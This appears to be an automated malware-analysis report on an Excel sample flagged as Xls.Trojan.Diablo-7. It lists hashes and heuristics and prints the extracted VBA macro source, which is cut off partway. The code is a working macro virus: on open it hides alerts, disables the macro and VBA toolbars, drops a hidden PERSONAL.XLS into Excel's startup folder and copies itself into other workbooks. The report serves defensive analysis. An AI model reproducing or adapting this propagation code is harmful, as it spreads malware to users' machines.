Xls.Trojan.Diablo-7 Office (OLE) malware analysis — malicious · 2e8a8b280b056121

MALICIOUS

Office (OLE)

45.0 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: 060a8d997677503c2b76ae90de72a74e SHA-1: be35f575995c380baf9093ba92f789663438ca18 SHA-256: 2e8a8b280b0561215bf1f9f3d6b9fcbad2d94b32464557ed5f772c511ca5070e

120 Risk Score

Malware Insights

Xls.Trojan.Diablo-7 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel spreadsheet containing a malicious Auto_Open VBA macro. This macro is designed to execute automatically upon opening the document, likely to download and execute a secondary payload. The ClamAV detection name 'Xls.Trojan.Diablo-7' strongly suggests a known trojan family associated with this behavior.

Heuristics 3

ClamAV: Xls.Trojan.Diablo-7 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Diablo-7
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10473 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10473 bytes
SHA-256: `5819226e856dc7bad3068dbb1ca5cbded542a279690692366f16b2574d1a5c86`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet4" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet5" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet6" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "C342" ' Diablos Macro ' Bios Virus Macro - (C) Copyright 1999/2000 Public Macro As String Sub auto_open() Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14" On Error GoTo ErrorHandler MkDir (Application.StartupPath) On Error GoTo 0 GoTo ErrorHandler ErrorHandler: For i = 1 To ThisWorkbook.VBProject.VBComponents.Count Cadena = ThisWorkbook.VBProject.VBComponents(i).Name Letras = Left(Cadena, 1): Numero = Right(Cadena, 3) If Letras = "C" And Numeros <= "1000" Then Macro = ThisWorkbook.VBProject.VBComponents(i).Name End If Next Application.OnSheetActivate = "Modulo" End Sub Sub Modulo() Attribute Modulo.VB_ProcData.VB_Invoke_Func = " \n14" Randomize Application.ScreenUpdating = False Application.DisplayAlerts = False Set Bar1 = CommandBars("Macro") Bar1.Enabled = False Set Bar2 = CommandBars("Visual Basic") Bar2.Enabled = False install = 0 Intr = Int((Rnd * 1000) + 1) Play = ("C" & Intr) If ThisWorkbook.Name <> "PERSONAL.XLS" Then If Dir(Application.StartupPath + "\PERSONAL.XLS") = "PERSONAL.XLS" Then install = 1 If install = 0 Then Workbooks.Add.SaveAs FileName:=Application.StartupPath + "\PERSONAL.XLS" ThisWorkbook.VBProject.VBComponents(Macro).Export (Macro) Workbooks("PERSONAL.XLS").VBProject.VBComponents.Import (Macro) Workbooks("PERSONAL.XLS").VBProject.VBComponents(Macro).Name = Play Workbooks("PERSONAL.XLS").Save Windows("PERSONAL.XLS").Visible = False End If Else Windows("PERSONAL.XLS").Visible = False For i = 1 To ActiveWorkbook.VBProject.VBComponents.Count Cadena = ActiveWorkbook.VBProject.VBComponents(i).Name Letras = Left(Cadena, 1): Numero = Right(Cadena, 3) If Letras = "C" And Numeros <= "1000" Then install = 1 Next If install = 0 Then Workbooks("PERSONAL.XLS").VBProject.VBComponents(Macro).Export (Macro) ActiveWorkbook.VBProject.VBComponents.Import (Macro) ActiveWorkbook.VBProject.VBComponents(Macro).Name = Play Workbooks(ActiveWorkbook.Name).Save ... (truncated)

SHA-256: 5819226e856dc7bad3068dbb1ca5cbded542a279690692366f16b2574d1a5c86

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "C342"
' Diablos Macro
' Bios Virus Macro - (C) Copyright 1999/2000

Public Macro As String

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo ErrorHandler
    MkDir (Application.StartupPath)
    On Error GoTo 0
    GoTo ErrorHandler
ErrorHandler:
For i = 1 To ThisWorkbook.VBProject.VBComponents.Count
    Cadena = ThisWorkbook.VBProject.VBComponents(i).Name
    Letras = Left(Cadena, 1): Numero = Right(Cadena, 3)
    If Letras = "C" And Numeros <= "1000" Then
       Macro = ThisWorkbook.VBProject.VBComponents(i).Name
    End If
Next
Application.OnSheetActivate = "Modulo"
End Sub

Sub Modulo()
Attribute Modulo.VB_ProcData.VB_Invoke_Func = " \n14"
    Randomize
    Application.ScreenUpdating = False
    Application.DisplayAlerts = False
    Set Bar1 = CommandBars("Macro")
        Bar1.Enabled = False
    Set Bar2 = CommandBars("Visual Basic")
        Bar2.Enabled = False
    install = 0
    Intr = Int((Rnd * 1000) + 1)
    Play = ("C" & Intr)
    If ThisWorkbook.Name <> "PERSONAL.XLS" Then
       If Dir(Application.StartupPath + "\PERSONAL.XLS") = "PERSONAL.XLS" Then install = 1
       If install = 0 Then
          Workbooks.Add.SaveAs FileName:=Application.StartupPath + "\PERSONAL.XLS"
          ThisWorkbook.VBProject.VBComponents(Macro).Export (Macro)
          Workbooks("PERSONAL.XLS").VBProject.VBComponents.Import (Macro)
          Workbooks("PERSONAL.XLS").VBProject.VBComponents(Macro).Name = Play
          Workbooks("PERSONAL.XLS").Save
          Windows("PERSONAL.XLS").Visible = False
       End If
    Else
       Windows("PERSONAL.XLS").Visible = False
       For i = 1 To ActiveWorkbook.VBProject.VBComponents.Count
           Cadena = ActiveWorkbook.VBProject.VBComponents(i).Name
           Letras = Left(Cadena, 1): Numero = Right(Cadena, 3)
           If Letras = "C" And Numeros <= "1000" Then install = 1
       Next
       If install = 0 Then
          Workbooks("PERSONAL.XLS").VBProject.VBComponents(Macro).Export (Macro)
          ActiveWorkbook.VBProject.VBComponents.Import (Macro)
          ActiveWorkbook.VBProject.VBComponents(Macro).Name = Play
          Workbooks(ActiveWorkbook.Name).Save
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.